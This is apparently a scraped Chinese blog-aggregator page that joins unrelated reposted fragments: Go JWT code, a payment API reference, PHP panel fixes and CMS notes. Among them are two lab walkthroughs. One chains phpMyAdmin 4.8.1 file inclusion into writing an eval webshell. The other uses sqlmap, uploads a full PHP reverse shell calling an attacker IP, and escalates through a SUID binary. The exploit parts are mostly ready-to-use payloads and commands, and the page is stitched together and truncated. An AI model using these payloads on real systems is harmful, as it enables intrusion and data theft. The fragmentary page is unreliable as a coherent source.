tokenStr := strings.Replace(tokenHeader, "Bearer ", "", 1) token, err := jwt.Parse(tokenStr, func(token jwt.Token) (interface{}, error) { if _, ok := token.Method.(jwt.SigningMethodHMAC); !ok { return nil, fmt.Errorf("Unexpected signing method: %v", token.Header["alg"]) } return jwtKey, nil }) if err != nil { http.Error(w, "Unauthorized", http.StatusUnauthorized) return } if !token.Valid { http.Error(w, "Unauthorized", http.StatusUnauthorized) return } next.ServeHTTP(w, r) } } http.HandleFunc("/protected", authMiddleware(http.HandlerFunc(func(w http.ResponseWriter, r http.Request) { claims := token.Claims.(jwt.MapClaims) userID := int(claims["subject"].(float64)) // 根据UserID获取用户信息或其他操作... }))) 3. 刷新令牌与过期处理 为了提高用户体验并减少用户在频繁登录的情况下的不便,可以实现一个令牌刷新机制。当JWT过期时,用户可以发送请求以获取新的令牌。这通常涉及到更新JWT的ExpiresAt字段,并相应地更新数据库中的记录。 go func refreshToken(w http.ResponseWriter, r http.Request) { claims := token.Claims.(jwt.MapClaims) userID := int(claims["subject"].(float64)) // 更新数据库中的用户信息以延长有效期 err := orm.Update(&User{Id: userID}, "expires_at = ?", time.Now().Add(time.Hour24)) if err != nil { http.Error(w, "Internal Server Error", http.StatusInternalServerError) return } newToken, err := createToken(userID) if err != nil { http.Error(w, "Internal Server Error", http.StatusInternalServerError) return } w.Write([]byte(newToken)) } 4. 总结与展望 通过上述步骤,我们不仅实现了JWT在Beego框架下的集成与管理,还探讨了其在实际应用中的实用性和灵活性。JWT令牌的生命周期管理对于增强Web应用的安全性和用户体验至关重要。哎呀,你懂的,就是说啊,咱们程序员小伙伴们要是能不断深入研究密码学这门学问,然后老老实实地跟着那些最佳做法走,那在面对各种安全问题的时候就轻松多了,咱开发出来的系统自然就又稳当又高效啦!就像是有了金刚钻,再硬的活儿都能干得溜溜的! 在未来的开发中,持续关注安全漏洞和最佳实践,不断优化和升级JWT的实现策略,将有助于进一步提升应用的安全性和性能。哎呀,随着科技这玩意儿越来越发达,咱们得留意一些新的认证方式啦。比如说 OAuth 2.0 啊,这种东西挺适合用在各种不同的场合和面对各种变化的需求时。你想想,就像咱们出门逛街,有时候用钱包,有时候用手机支付,对吧?认证机制也一样,得根据不同的情况选择最合适的方法,这样才能更灵活地应对各种挑战。所以,探索并尝试使用 OAuth 2.0 这类工具,让咱们的技术应用更加多样化和适应性强,听起来挺不错的嘛!
2024-10-15 16:05:11
70
风中飘零
转载文章
...子。 在index.php文件里包含1.txt,而1.txt的内容是phpinfo(),include函数包含1.txt,就会把1.txt的内容当成php文件执行,不管后缀是什么。1.txt也好,1.xml也好,只要里面是php代码,然后有被include函数包含,那么就被当成PHP文件执行。 如果包含的文件不存在,就会出现致命的错误,并报出绝对路径,然是不影响其他功能的执行,比如这里的nf和123的输出。那么就表明include函数,如果出现错误的话,并不会影响其他功能的运行。 如果包含的文件不存在,就会出现致命的错误,并报出绝对路径,影响后面功能的执行,比如这里的nf的输出,后面的功能因为2.txt报错,导致123未执行。那么就表明require函数,如果出现错误的话,会影响后面功能的运行。 只要文件内是php代码,文件包含是不在意文件后缀的。 12345.jpg的传参值是a,那么我们可以写传参值=file_put_contents(‘8.php’,’<?php eval($_REQUEST[a]);?>’) 然后生成一个新的php文件 访问index.php 以上我们接触的全部是本地文件包含 说了本地文件包含,我们再来看远程文件包含 简单来说远程文件包含,就是可以包含其他主机上的文件,并当成php代码执行。 要实现远程文件包含的话,php配置的allow_url_include = on必须为on(开启) 来我们可以来实验一下,把这个配置打开。 “其他选项菜单”——“打开配置文件”——“php-ini” 打开配置文件,搜索allow_url_include 把Off改为On,注:第一个字母要为大写 之后要重启才能生效。 配置开启后,我们来远程文件包含一下,我们来远程包含一下kali上的1.txt,可以看到没有本地包含,所以直接显示的内容。 那我们现在来远程包含一下kali的这个1.txt,看会不会有phpinfo,注意我这里是index文件哦,所以是默认的。 可以看到,包含成功! 这里可以插一句题外话,如果是window服务器的话,可以让本地文件包含变成远程文件包含。需要开始XX配置,SMB服务。 这里我们可以发现,进入一个不存在的目录,然后再返回上一级,相当于没变目录位置,这个是不影响的,而且这个不存在的目录随便怎么写都可以。 但是php是非常严格的,进入一个不存在的目录,这里目录的名字里不能有?号,否则报错,然后再返回上一级,相当于没变目录位置,这个是不影响的,而且这个不存在的目录随便怎么写都可以。 实战 注意,这里php版本过低,会安装不上 安装好后,我们来解析下源码 1.txt内容phpinfo() 来本地文件包含一下,发现成功 http://127.0.0.1/phpmyadmin/phpMyAdmin-4.8.1-all-languages/index.php?target=db_sql.php%253f/../11.txt 靶场 http://59.63.200.79:8010/lfi/phpmyadmin/ 先创建一个库名:nf 接着创建表:ff,字段数选2个就行了 然后选中我们之前创建好的库名和表名,开始写入数据,第一个就写个一句话木马,第二个随便填充。 然后我们找到存放表的路径。 这里我们要传参2个,那么就加上&这里我们找到之后传参phpinfo http://59.63.200.79:8010/phpmyadmin/phpMyAdmin-4.8.1-all-languages/index.php?target=db_sql.php%253f/…/…/…/…/…/phpstudy/mysql/data/nf/ff.frm&a=phpinfo(); 因为a在ff.frm里 <?php eval($_REQUEST[a])?>注意,这里面没有分号和单引号 文件包含成功 用file_put_contents(‘8.php’,’<?php eval($_REQUEST[a]);?>’)写入一句话木马 http://59.63.200.79:8010/phpmyadmin/phpMyAdmin-4.8.1-all-languages/index.php?target=db_sql.php%253f/…/…/…/…/…/phpstudy/mysql/data/nf/ff.frm&a=file_put_contents(‘8.php’,’<?php eval($_REQUEST[a])?>’); <?php eval($_REQUEST[a])?>注意,这里面没有分号和单引号 写入成功后,我们连接这个8.php的木马。 http://59.63.200.79:8010/phpmyadmin/phpMyAdmin-4.8.1-all-languages/8.php 在线测试时这样,但是我在本地测试的时候,还是有点不一样的。我就直接上不一样的地方,前面的地方都是一样的 1,创建一个库为yingqian1984, 2,创建一个表为yq1984 3,填充表数据,因为跟上面一样,2个字段一个木马,一个随便数据 4,找数据表的位置,最后我发现我的MySQL存放数据库的地方是在 C:\ProgramData\MySQL\MySQL Server 5.7\Data\yingqian1984 文件包含成功。 http://127.0.0.1/phpmyadmin/phpMyAdmin-4.8.1-all-languages/index.php?target=db_sql.php%253f/…/…/…/…/ProgramData/MySQL/MySQL Server 5.7/Data/yingqian1984/qy1984.frm&a=phpinfo(); 用file_put_contents(‘9.php’,’<?php eval($_REQUEST[a]);?>’)写入一句话木马 http://127.0.0.1/phpmyadmin/phpMyAdmin-4.8.1-all-languages/index.php?target=db_sql.php%253f/…/…/…/…/ProgramData/MySQL/MySQL Server 5.7/Data/yingqian1984/qy1984.frm&a=file_put_contents(‘9.php’,’<?php eval($_REQUEST[a])?>’); <?php eval($_REQUEST[a])?>注意,这里面没有分号和单引号 传参成功 http://127.0.0.1/phpmyadmin/phpMyAdmin-4.8.1-all-languages/9.php?a=phpinfo(); 本篇文章为转载内容。原文链接:https://blog.csdn.net/qq_45300786/article/details/108724251。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2024-01-06 09:10:40
343
转载
转载文章
...an.cn/api.php?act=query&pid={商户ID}&sign={签名字符串} 请求参数说明: 字段名变量名必填类型示例值描述 操作类型act是Stringquery此API固定值 商户IDpid是Int1001 签名字符串sign是String67d12af9ddbe38d9c7b0931ad102ca3c签名算法与支付宝签名算法相同 返回结果: 字段名变量名类型示例值描述 返回状态码codeInt11为成功,其它值为失败 商户IDpidInt1001所创建的商户ID 商户密钥keyString(32)89unJUB8HZ54Hj7x4nUj56HN4nUzUJ8i所创建的商户密钥 商户类型typeInt1此值暂无用 商户状态activeInt11为正常,0为封禁 商户余额moneyString0.00商户所拥有的余额 结算账号accountString1070077170@qq.com结算的支付宝账号 结算姓名usernameString张三结算的支付宝姓名 满多少自动结算settle_moneyString30此值为系统预定义 手动结算手续费settle_feeString1此值为系统预定义 每笔订单分成比例money_rateString98此值为系统预定义 [API]查询结算记录 URL地址:http://pay.lqan.cn/api.php?act=settle&pid={商户ID}&sign={签名字符串} 请求参数说明: 字段名变量名必填类型示例值描述 操作类型act是Stringsettle此API固定值 商户IDpid是Int1001 签名字符串sign是String67d12af9ddbe38d9c7b0931ad102ca3c签名算法与支付宝签名算法相同 返回结果: 字段名变量名类型示例值描述 返回状态码codeInt11为成功,其它值为失败 返回信息msgString查询结算记录成功! 结算记录dataArray结算记录列表 [API]查询单个订单 URL地址:http://pay.lqan.cn/api.php?act=order&pid={商户ID}&out_trade_no={商户订单号}&sign={签名字符串} 请求参数说明: 字段名变量名必填类型示例值描述 操作类型act是Stringorder此API固定值 商户IDpid是Int1001 商户订单号out_trade_no是String20160806151343349 签名字符串sign是String67d12af9ddbe38d9c7b0931ad102ca3c签名算法与支付宝签名算法相同 返回结果: 字段名变量名类型示例值描述 返回状态码codeInt11为成功,其它值为失败 返回信息msgString查询订单号成功! 易支付订单号trade_noString2016080622555342651凉秋易支付订单号 商户订单号out_trade_noString20160806151343349商户系统内部的订单号 支付方式typeStringalipayalipay:支付宝,tenpay:财付通, qqpay:QQ钱包,wxpay:微信支付 商户IDpidInt1001发起支付的商户ID 创建订单时间addtimeString2016-08-06 22:55:52 完成交易时间endtimeString2016-08-06 22:55:52 商品名称nameStringVIP会员 商品金额moneyString1.00 支付状态statusInt01为支付成功,0为未支付 [API]批量查询订单 URL地址:http://pay.lqan.cn/api.php?act=orders&pid={商户ID}&sign={签名字符串} 请求参数说明: 字段名变量名必填类型示例值描述 操作类型act是Stringorders此API固定值 商户IDpid是Int1001 查询订单数量limit否Int20返回的订单数量,最大50 签名字符串sign是String67d12af9ddbe38d9c7b0931ad102ca3c签名算法与支付宝签名算法相同 返回结果: 字段名变量名类型示例值描述 返回状态码codeInt11为成功,其它值为失败 返回信息msgString查询结算记录成功! 订单列表dataArray订单列表 [API]支付订单退款 URL地址:http://pay.lqan.cn/api.php?act=refund&pid={商户ID}&out_trade_no={商户订单号}&sign={签名字符串} 只支持微信官方、QQ钱包官方、当面付退款 请求参数说明: 字段名变量名必填类型示例值描述 操作类型act是Stringrefund此API固定值 商户IDpid是Int1001 商户订单号out_trade_no是Int1000 退款原因desc否String 退款金额money否Double20.00不填默认退全款 签名字符串sign是String67d12af9ddbe38d9c7b0931ad102ca3c签名算法与支付宝签名算法相同 返回结果: 字段名变量名类型示例值描述 返回状态码codeInt11为成功,其它值为失败 返回信息msgString退款成功! 发起支付请求 URL地址:http://pay.lqan.cn/submit.php?pid={商户ID}&type={支付方式}&out_trade_no={商户订单号}¬ify_url={服务器异步通知地址}&return_url={页面跳转通知地址}&name={商品名称}&money={金额}&sitename={网站名称}&sign={签名字符串}&sign_type=MD5 请求参数说明: 字段名变量名必填类型示例值描述 商户IDpid是Int1001 支付方式type是Stringalipayalipay:支付宝,tenpay:财付通, qqpay:QQ钱包,wxpay:微信支付 商户订单号out_trade_no是String20160806151343349 异步通知地址notify_url是Stringhttp://域名/notify_url.php服务器异步通知地址 跳转通知地址return_url是Stringhttp://域名/return_url.php页面跳转通知地址 商品名称name是StringVIP会员 商品金额money是String1.00 网站名称sitename否String某某某平台 签名字符串sign是String202cb962ac59075b964b07152d234b70签名算法与支付宝签名算法相同 签名类型sign_type是StringMD5默认为MD5 支付结果通知 通知类型:服务器异步通知(notify_url)、页面跳转通知(return_url) 请求方式:GET 特别说明:回调成功之后请输出 SUCCESS字符串,如果没有收到商户响应的SUCCESS字符串,系统将通过策略重新通知5次,通知频率为15s/60s/3m/30m/1h 请求参数说明: 字段名变量名必填类型示例值描述 商户IDpid是Int1001 易支付订单号trade_no是String20160806151343349021凉秋易支付订单号 商户订单号out_trade_no是String20160806151343349商户系统内部的订单号 支付方式type是Stringalipayalipay:支付宝,tenpay:财付通, qqpay:QQ钱包,wxpay:微信支付 商品名称name是StringVIP会员 商品金额money是String1.00 支付状态trade_status是StringTRADE_SUCCESS 签名字符串sign是String202cb962ac59075b964b07152d234b70签名算法与支付宝签名算法相同 签名类型sign_type是StringMD5默认为MD5 签名算法 请对参数按照键名进行降序排序(a-z)sign sign_type 和空值不进行签名!。 排序后请操作参数生成或拼接一个url请求字符串 例如 a=b&c=d&e=f (Url值不能携带参数!不要进行urlencode) 再将拼接好的请求字符串与平台生成的Key进行MD5加密得出sign签名参数 MD5 ( a=b&c=d&e=f + KEY ) (注意:+ 为各语言的拼接符!不是字符!) 本篇文章为转载内容。原文链接:https://blog.csdn.net/weixin_39620334/article/details/115933932。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-12-18 16:55:58
91
转载
转载文章
... /welcome.php HTTP/1.1Host: 192.168.184.149Content-Length: 23Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: http://192.168.184.149Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: http://192.168.184.149/welcome.phpAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=jub1jihglt85brngo5imqsifb3Connection: closesearch=x 将数据包保存为文件 hackme1.txt 使用 sqlmap 跑一下测试漏洞并获取数据库名: 🚀 python sqlmap.py -r hackme1.txt --dbs --batch [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-DjhXfuV9-1650016495544)(https://cdn.jsdelivr.net/gh/hirak0/Typora/img/image-20220110171527015.png)] 数据库除了基础数据库有webapphacking 接下来咱们获取一下表名 🚀 python sqlmap.py -r hackme1.txt --batch -D webapphacking --tables [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-1mzxiwhu-1650016495544)(C:\Users\zhang\AppData\Roaming\Typora\typora-user-images\image-20220110172336353.png)] 可以得到两个表books和users 咱们先获取一下users表的信息 🚀 python sqlmap.py -r hackme1.txt --batch -D webapphacking -T users --dump --batch 可以看到有一个superadmin,超级管理员,看起来像一个md5 扩展 在线解密md5网站 国内MD5解密: http://t007.cn/ https://cmd5.la/ https://cmd5.com/ https://pmd5.com/ http://ttmd5.com/ https://md5.navisec.it/ http://md5.tellyou.top/ https://www.somd5.com/ http://www.chamd5.org/ 国外MD5解密: https://www.md5tr.com/ http://md5.my-addr.com/ https://md5.gromweb.com/ https://www.md5decrypt.org/ https://md5decrypt.net/en/ https://md5hashing.net/hash/md5/ https://hashes.com/en/decrypt/hash https://www.whatsmyip.org/hash-lookup/ https://www.md5online.org/md5-decrypt.html https://md5-passwort.de/md5-passwort-suchen 解出来密码是:Uncrackable 登录上去,发现有上传功能 2.3.2 文件上传漏洞 getshell 将 kali 自带的 php-reverse-shell.php 复制一份到 查看文件内容,并修改IP地址 <?php// php-reverse-shell - A Reverse Shell implementation in PHP// Copyright (C) 2007 pentestmonkey@pentestmonkey.net//// This tool may be used for legal purposes only. Users take full responsibility// for any actions performed using this tool. The author accepts no liability// for damage caused by this tool. If these terms are not acceptable to you, then// do not use this tool.//// In all other respects the GPL version 2 applies://// This program is free software; you can redistribute it and/or modify// it under the terms of the GNU General Public License version 2 as// published by the Free Software Foundation.//// This program is distributed in the hope that it will be useful,// but WITHOUT ANY WARRANTY; without even the implied warranty of// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the// GNU General Public License for more details.//// You should have received a copy of the GNU General Public License along// with this program; if not, write to the Free Software Foundation, Inc.,// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.//// This tool may be used for legal purposes only. Users take full responsibility// for any actions performed using this tool. If these terms are not acceptable to// you, then do not use this tool.//// You are encouraged to send comments, improvements or suggestions to// me at pentestmonkey@pentestmonkey.net//// Description// -----------// This script will make an outbound TCP connection to a hardcoded IP and port.// The recipient will be given a shell running as the current user (apache normally).//// Limitations// -----------// proc_open and stream_set_blocking require PHP version 4.3+, or 5+// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.//// Usage// -----// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.set_time_limit (0);$VERSION = "1.0";$ip = '192.168.184.128'; // CHANGE THIS$port = 6666; // CHANGE THIS$chunk_size = 1400;$write_a = null;$error_a = null;$shell = 'uname -a; w; id; /bin/sh -i';$daemon = 0;$debug = 0;//// Daemonise ourself if possible to avoid zombies later//// pcntl_fork is hardly ever available, but will allow us to daemonise// our php process and avoid zombies. Worth a try...if (function_exists('pcntl_fork')) {// Fork and have the parent process exit$pid = pcntl_fork();if ($pid == -1) {printit("ERROR: Can't fork");exit(1);}if ($pid) {exit(0); // Parent exits}// Make the current process a session leader// Will only succeed if we forkedif (posix_setsid() == -1) {printit("Error: Can't setsid()");exit(1);}$daemon = 1;} else {printit("WARNING: Failed to daemonise. This is quite common and not fatal.");}// Change to a safe directorychdir("/");// Remove any umask we inheritedumask(0);//// Do the reverse shell...//// Open reverse connection$sock = fsockopen($ip, $port, $errno, $errstr, 30);if (!$sock) {printit("$errstr ($errno)");exit(1);}// Spawn shell process$descriptorspec = array(0 => array("pipe", "r"), // stdin is a pipe that the child will read from1 => array("pipe", "w"), // stdout is a pipe that the child will write to2 => array("pipe", "w") // stderr is a pipe that the child will write to);$process = proc_open($shell, $descriptorspec, $pipes);if (!is_resource($process)) {printit("ERROR: Can't spawn shell");exit(1);}// Set everything to non-blocking// Reason: Occsionally reads will block, even though stream_select tells us they won'tstream_set_blocking($pipes[0], 0);stream_set_blocking($pipes[1], 0);stream_set_blocking($pipes[2], 0);stream_set_blocking($sock, 0);printit("Successfully opened reverse shell to $ip:$port");while (1) {// Check for end of TCP connectionif (feof($sock)) {printit("ERROR: Shell connection terminated");break;}// Check for end of STDOUTif (feof($pipes[1])) {printit("ERROR: Shell process terminated");break;}// Wait until a command is end down $sock, or some// command output is available on STDOUT or STDERR$read_a = array($sock, $pipes[1], $pipes[2]);$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);// If we can read from the TCP socket, send// data to process's STDINif (in_array($sock, $read_a)) {if ($debug) printit("SOCK READ");$input = fread($sock, $chunk_size);if ($debug) printit("SOCK: $input");fwrite($pipes[0], $input);}// If we can read from the process's STDOUT// send data down tcp connectionif (in_array($pipes[1], $read_a)) {if ($debug) printit("STDOUT READ");$input = fread($pipes[1], $chunk_size);if ($debug) printit("STDOUT: $input");fwrite($sock, $input);}// If we can read from the process's STDERR// send data down tcp connectionif (in_array($pipes[2], $read_a)) {if ($debug) printit("STDERR READ");$input = fread($pipes[2], $chunk_size);if ($debug) printit("STDERR: $input");fwrite($sock, $input);} }fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);// Like print, but does nothing if we've daemonised ourself// (I can't figure out how to redirect STDOUT like a proper daemon)function printit ($string) {if (!$daemon) {print "$string\n";} }?> [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-RhgS5l2a-1650016495549)(https://cdn.jsdelivr.net/gh/hirak0/Typora/img/image-20220110173559344.png)] 上传该文件 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-CKEldpll-1650016495549)(https://cdn.jsdelivr.net/gh/hirak0/Typora/img/image-20220110173801442.png)] 在 kali 监听:nc -lvp 6666 访问后门文件:http://192.168.184.149/php-reverse-shell.php 不成功 尝试加上传文件夹:http://192.168.184.149/uploads/php-reverse-shell.php 成功访问 使用 python 切换为 bash:python3 -c 'import pty; pty.spawn("/bin/bash")' 2.4权限提升 2.4.1 SUID 提权 sudo -l不顶用了,换个方法 查询 suid 权限程序: find / -perm -u=s -type f 2>/dev/null www-data@hackme:/$ find / -perm -u=s -type f 2>/dev/nullfind / -perm -u=s -type f 2>/dev/null/snap/core20/1270/usr/bin/chfn/snap/core20/1270/usr/bin/chsh/snap/core20/1270/usr/bin/gpasswd/snap/core20/1270/usr/bin/mount/snap/core20/1270/usr/bin/newgrp/snap/core20/1270/usr/bin/passwd/snap/core20/1270/usr/bin/su/snap/core20/1270/usr/bin/sudo/snap/core20/1270/usr/bin/umount/snap/core20/1270/usr/lib/dbus-1.0/dbus-daemon-launch-helper/snap/core20/1270/usr/lib/openssh/ssh-keysign/snap/core/6531/bin/mount/snap/core/6531/bin/ping/snap/core/6531/bin/ping6/snap/core/6531/bin/su/snap/core/6531/bin/umount/snap/core/6531/usr/bin/chfn/snap/core/6531/usr/bin/chsh/snap/core/6531/usr/bin/gpasswd/snap/core/6531/usr/bin/newgrp/snap/core/6531/usr/bin/passwd/snap/core/6531/usr/bin/sudo/snap/core/6531/usr/lib/dbus-1.0/dbus-daemon-launch-helper/snap/core/6531/usr/lib/openssh/ssh-keysign/snap/core/6531/usr/lib/snapd/snap-confine/snap/core/6531/usr/sbin/pppd/snap/core/5662/bin/mount/snap/core/5662/bin/ping/snap/core/5662/bin/ping6/snap/core/5662/bin/su/snap/core/5662/bin/umount/snap/core/5662/usr/bin/chfn/snap/core/5662/usr/bin/chsh/snap/core/5662/usr/bin/gpasswd/snap/core/5662/usr/bin/newgrp/snap/core/5662/usr/bin/passwd/snap/core/5662/usr/bin/sudo/snap/core/5662/usr/lib/dbus-1.0/dbus-daemon-launch-helper/snap/core/5662/usr/lib/openssh/ssh-keysign/snap/core/5662/usr/lib/snapd/snap-confine/snap/core/5662/usr/sbin/pppd/snap/core/11993/bin/mount/snap/core/11993/bin/ping/snap/core/11993/bin/ping6/snap/core/11993/bin/su/snap/core/11993/bin/umount/snap/core/11993/usr/bin/chfn/snap/core/11993/usr/bin/chsh/snap/core/11993/usr/bin/gpasswd/snap/core/11993/usr/bin/newgrp/snap/core/11993/usr/bin/passwd/snap/core/11993/usr/bin/sudo/snap/core/11993/usr/lib/dbus-1.0/dbus-daemon-launch-helper/snap/core/11993/usr/lib/openssh/ssh-keysign/snap/core/11993/usr/lib/snapd/snap-confine/snap/core/11993/usr/sbin/pppd/usr/lib/eject/dmcrypt-get-device/usr/lib/openssh/ssh-keysign/usr/lib/snapd/snap-confine/usr/lib/policykit-1/polkit-agent-helper-1/usr/lib/dbus-1.0/dbus-daemon-launch-helper/usr/bin/pkexec/usr/bin/traceroute6.iputils/usr/bin/passwd/usr/bin/chsh/usr/bin/chfn/usr/bin/gpasswd/usr/bin/at/usr/bin/newgrp/usr/bin/sudo/home/legacy/touchmenot/bin/mount/bin/umount/bin/ping/bin/ntfs-3g/bin/su/bin/fusermount 发现一个可疑文件/home/legacy/touchmenot 在 https://gtfobins.github.io/网站上查询:touchmenot 没找到 尝试运行程序:发现直接提权成功 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-qcpXI6zZ-1650016495551)(https://cdn.jsdelivr.net/gh/hirak0/Typora/img/image-20220110174530827.png)] 找半天没找到flag的文件 what?就这? 总结 本节使用的工具和漏洞比较基础,涉及 SQL 注入漏洞和文件上传漏洞 sql 注入工具:sqlmap 抓包工具:burpsuite Webshell 后门:kali 内置后门 Suid 提权:touchmenot 提权 本篇文章为转载内容。原文链接:https://blog.csdn.net/Perpetual_Blue/article/details/124200651。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-01-02 12:50:54
497
转载
PHP
...新的宝塔面板,却发现PHP服务无法启动?别担心,这并不罕见,我们都知道,PHP作为Web开发的基石,它的稳定运行对我们的项目至关重要。接下来,咱们一块儿踏上解谜之旅,我会一步步揭示问题背后的玄机,手把手教你如何让PHP环境满血复活,就像给老朋友做一次舒爽的大扫除! 二、现象分析 1.1 现象描述 当你打开宝塔面板,点击“PHP版本”或者“PHP-FPM”管理,可能会看到一个红色的感叹号或者错误提示,告诉你PHP无法启动。这可能表现为“无法连接到服务器”、“缺少文件”或“配置错误”。 1.2 错误日志线索 查看PHP的日志文件(通常在/var/log/php-fpm.log或/var/log/php_error.log)是定位问题的第一步。有时候你会遇到一些小麻烦,比如找不到那个神秘的php.ini小伙伴,或者有些扩展好像还没跟上节奏,没好好加载起来。这些都是常见的小插曲,别担心,咱们一步步解决。 三、排查步骤 2.1 检查环境配置 确保PHP的安装路径正确,/usr/local/php或者/usr/bin/php,并且PHP-FPM服务已经正确安装并启用。可以运行以下命令检查: bash which php 如果返回路径正确,再运行: bash sudo service php-fpm status 确认服务状态。 2.2 检查php.ini 确认php.ini文件存在且权限正确,可以尝试编辑它,看看是否有禁止运行的设置: bash nano /usr/local/php/etc/php.ini 确保extension_dir指向正确的扩展目录,并且没有禁用必需的扩展,如mysqli或gd。 2.3 检查扩展 有些情况下,扩展可能没有正确安装或加载。打个比方,假如你需要PDO_MYSQL这个东东,记得在你的PHP配置文件里,Windows系统下应该是"extension=php_pdo_mysql.dll",Linux系统上则是"extension=pdo_mysql.so",别忘了加! 四、实例演示 假设你遇到了extension_dir未定义的问题,可以在php.ini中添加如下行: ini extension_dir = "/usr/local/php/lib/php/extensions/no-debug-non-zts-20200930" 然后重启PHP-FPM服务: bash sudo service php-fpm restart 五、高级排查与解决方案 3.1 检查防火墙 如果防火墙阻止了PHP-FPM的访问,需要开放相关端口,通常是9000。 3.2 安全组设置 如果你在云环境中,记得检查安全组规则,确保允许来自外部的请求访问PHP-FPM。 六、结语 通过以上步骤,你应该能解决大部分PHP在宝塔面板无法启动的问题。当然,每个环境都有其独特性,可能需要针对具体情况进行调整。遇到复杂问题时,不妨寻求社区的帮助,或者查阅官方文档,相信你一定能找到答案。记住,解决问题的过程也是一种学习,祝你在PHP的世界里越走越远!
2024-05-01 11:21:33
564
幽谷听泉_
转载文章
...源几大特点的开源内容管理系统,是国内开源CMS的领先品牌,目前程序安装量已达七十万,超过六成的站点正在使用织梦CMS或基于织梦CMS核心开发。 织梦Dede CMS功能特点: 良好的用户口碑,丰富的开源经验 灵活的模块组合,让网站更丰富 简单易用的模板引擎,网站界面想换就换 便捷自定义模型 高效的动态静态页面部署 流畅专业界面设计,良好的用户体验 指纹验证,升级无忧 低维护成本 国际语言支持 会员互动,让您的网站火起来 DedeCMS 产品使用说明 一、平台需求 1.Windows 平台: IIS/Apache/Nginx + PHP4/PHP5.2+/PHP5.3+ + MySQL4/5 如果在windows环境中使用,建议用DedeCMS提供的DedeAMPZ套件以达到最佳使用性能。 2.Linux/Unix 平台 Apache + PHP4/PHP5 + MySQL3/4/5 (PHP必须在非安全模式下运行) 建议使用平台:Linux + Apache2.2 + PHP5.2/PHP5.3 + MySQL5.0 3.PHP必须环境或启用的系统函数: allow_url_fopen GD扩展库 MySQL扩展库 系统函数 —— phpinfo、dir 4.基本目录结构 / ..../install 安装程序目录,安装完后可删除[安装时必须有可写入权限] ..../dede 默认后台管理目录(可任意改名) ..../include 类库文件目录 ..../plus 附助程序目录 ..../member 会员目录 ..../images 系统默认模板图片存放目录 ..../uploads 默认上传目录[必须可写入] ..../a 默认HTML文件存放目录[必须可写入] ..../templets 系统默认内核模板目录 ..../data 系统缓存或其它可写入数据存放目录[必须可写入] ..../special 专题目录[生成一次专题后可以删除special/index.php,必须可写入] 5.PHP环境容易碰到的不兼容性问题 (1)data目录没写入权限,导致系统session无法使用,这将导致无法登录管理后台(直接表现为验证码不能正常显示); (2)php的上传的临时文件夹没设置好或没写入权限,这会导致文件上传的功能无法使用; (3)出现莫名的错误,如安装时显示空白,这样能是由于系统没装载mysql扩展导致的,对于初级用户,可以下载dede的php套件包,以方便简单的使用。 二、程序安装使用 1.下载程序解压到本地目录; 2.上传程序目录中的/uploads到网站根目录 3.运行http://www.yourname.com/install/index.php(yourname表示你的域名),按照安装提速说明进行程序安装 本篇文章为转载内容。原文链接:https://blog.csdn.net/weixin_31879641/article/details/115616068。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-09-24 09:08:23
278
转载
转载文章
...性和复用性。 另外,PHP社区近期推出了Twig模板引擎的新版本,它在内容捕获与变量处理上也有所创新。例如,Twig中的“set”标签和“block”标签能够实现与Smarty capture类似的特性,甚至提供了更灵活的块级内容捕获与继承机制,这对于构建复杂、动态的网页布局具有显著优势。 同时,随着Serverless架构的发展,无服务器环境下的模板渲染方式也在不断演进。如AWS Lambda结合其云服务的API Gateway使用Velocity模板语言进行响应体的动态构建,这种场景下如何高效利用模板捕获功能来组装数据并返回给客户端,是值得开发者关注的技术实践。 此外,对于 Smarty 用户来说,除了掌握基本的内置函数外,了解 Smarty 3.x 到 Smarty 4 的新特性与迁移策略也至关重要。Smarty 4 提供了更多现代化的语法糖以及对 PHP 新特性的支持,有助于提高模板编写效率和运行性能。 总之,在持续发展的Web开发领域,无论是传统的Smarty模板引擎,还是新兴的前端框架与云服务模板技术,深入了解并掌握各种内容捕获与输出管理的方法,都是提升项目质量与开发体验的关键所在。
2023-12-03 17:52:39
79
转载
Hibernate
